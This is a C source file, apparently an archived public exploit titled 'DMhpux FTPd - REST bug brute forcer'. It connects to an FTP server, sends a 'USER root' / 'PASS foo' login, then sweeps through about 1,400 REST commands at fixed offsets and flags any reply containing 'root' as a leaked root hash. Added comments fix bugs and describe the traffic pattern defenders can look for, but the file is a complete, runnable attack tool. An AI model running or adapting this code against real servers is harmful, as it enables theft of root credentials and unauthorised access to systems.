C/C++ Source or Header  |  2005-05-06  |  2KB  |  96 lines

/*
 * Author: phased
 *
 * str0ke
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
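/* dorecv() is defined further down in this file; declare it before use so the
 * call sites below do not depend on an implicit declaration. */
int dorecv(int sock);

/*
 * Entry point of the program that announces itself as
 * "DMhpux FTPd - REST bug brute forcer".
 *
 * Connects to TCP port 21 on the host named in argv[1] and replays a fixed
 * FTP control-channel sequence: "USER root", "PASS foo" (the program itself
 * labels these "false login credentials"), then one REST command per offset
 * from 1073931080 to 1073945000 in steps of 10, i.e. 1393 REST commands.
 * Each server reply is printed by dorecv(), which also flags any reply that
 * contains the string "root".
 *
 * What this looks like to a defender: a single control connection on which
 * the client never checks whether the login succeeded, followed by a burst of
 * REST commands whose arguments fall between 0x4002E348 and 0x400319A8. A run
 * of REST commands on a session that has not authenticated and never starts a
 * transfer is the observable signature in FTP daemon logs or a packet capture.
 * NOTE(review): the file does not explain why this offset range was chosen;
 * presumably it is specific to the targeted server build.
 *
 * Returns 0 after the sweep completes. Exits with a failure status on a
 * usage, name-resolution, socket, connect or send error.
 */
int main (int argc, char *argv[]) {
    int sock, rc;
    long int i;
    struct sockaddr_in saddr;
    struct hostent *h;
    char buf[256];

    printf("DMhpux FTPd - REST bug brute forcer\n");
    printf("by phased\n");

    if (argc < 2) {
        printf("usage: %s <host> -- simple enough?\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    h = gethostbyname(argv[1]);
    if (h == NULL) {
        printf("%s: unknown host '%s'\n", argv[0], argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Only an IPv4 answer fits into sockaddr_in. Copying h_length bytes
     * unchecked could write past sin_addr if the resolver returned another
     * address family. */
    if (h->h_addrtype != AF_INET ||
        h->h_length != (int)sizeof(saddr.sin_addr.s_addr)) {
        fprintf(stderr, "%s: no IPv4 address for '%s'\n", argv[0], argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Zero the whole structure so sin_zero padding is not left as stack garbage. */
    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    memcpy(&saddr.sin_addr.s_addr, h->h_addr_list[0],
           sizeof(saddr.sin_addr.s_addr));
    saddr.sin_port = htons(21);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("cannot open socket ");
        exit(EXIT_FAILURE);
    }

    rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr));
    if (rc < 0) {
        perror("cannot connect ");
        close(sock);
        exit(EXIT_FAILURE);
    }

    printf("Sending false login credentials\n");
    snprintf(buf, sizeof(buf), "USER root\r\n");
    printf("sending %s\n", buf);
    rc = send(sock, buf, strlen(buf), 0);
    if (rc < 0) {
        perror("cannot send data ");
        close(sock);
        /* A failed send is an error; the original exited with status 0 here. */
        exit(EXIT_FAILURE);
    }
    dorecv(sock);
    usleep(1000);

    memset(buf, 0, sizeof(buf));
    snprintf(buf, sizeof(buf), "PASS foo\r\n");
    printf("sending %s\n", buf);
    rc = send(sock, buf, strlen(buf), 0);
    if (rc < 0) {
        perror("cannot send data ");
        close(sock);
        exit(EXIT_FAILURE);
    }
    usleep(1000);
    /* Two reads, as in the original: the reply to USER/PASS may arrive in
     * more than one chunk. The replies are printed but never interpreted. */
    dorecv(sock);
    dorecv(sock);

    for (i = 1073931080; i <= 1073945000; i = i + 10) {
        /* i is a long, so the conversion must be %ld; %d with a long
         * argument is undefined behaviour. */
        snprintf(buf, sizeof(buf), "REST %ld\r\n", i);
        printf("sending %s\n", buf);
        if (send(sock, buf, strlen(buf), 0) < 0) {
            perror("cannot send data ");
            close(sock);
            exit(EXIT_FAILURE);
        }
        dorecv(sock);
    }

    close(sock);
    return 0;
}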
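/*
 * Reads one chunk of the server's reply from sock, prints it, and reports
 * whether it contains the substring "root".
 *
 * At most sizeof(reply) - 1 bytes are read so the buffer can always be
 * NUL-terminated before it is handed to printf("%s") and strstr(). The
 * original read a full 256 bytes into a 256-byte buffer, so a full-size reply
 * left no terminator and both calls could run off the end of the array.
 *
 * Returns 1 if the reply contains "root" (after printing "Got root hash"),
 * 0 if it does not (including an empty read when the peer has closed the
 * connection), and -1 if recv() fails. The original fell off the end of a
 * non-void function without returning a value.
 */
int dorecv(int sock) {
    char reply[256];
    ssize_t got;

    got = recv(sock, reply, sizeof(reply) - 1, 0);
    if (got < 0) {
        perror("cannot receive data ");
        return -1;
    }
    reply[got] = '\0';

    printf("got: %s\n", reply);
    if (strstr(reply, "root") != NULL) {
        printf("Got root hash\n");
        return 1;
    }

    return 0;
}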